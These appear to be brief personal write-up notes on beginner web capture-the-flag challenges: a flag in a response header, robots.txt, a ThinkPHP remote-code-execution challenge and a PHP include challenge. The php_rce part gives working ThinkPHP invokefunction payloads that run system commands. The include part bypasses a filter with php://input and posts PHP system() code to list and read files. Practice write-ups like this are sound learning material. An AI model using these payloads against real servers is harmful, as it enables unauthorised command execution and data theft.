- I want to make it to the school team, I feel that I am not strong enough.
baby_web
- There is a hint in the question, think about which one on the initial page
- When you visit, the 1.php page is directly given to you
- Revisit index.php
- There is a flag in the response header
Training-WWW-Robots
- Not much to say that the purpose is to learn the crawler protocol
- Direct access to /Robots.txt
- Give the flag file directly
- Just visit
php_rce
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
??s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
- It’s really difficult to get the flag to put it into the third question.
Web_php_include
- The use of php pseudo-protocol
- ?page=phP://input Bypass the filtering of strstr
- Then there is the Hackbar upload
<?php system('ls ./'); ?>
<?php system('cat ./fl4gisisish3r3.php'); ?>
- over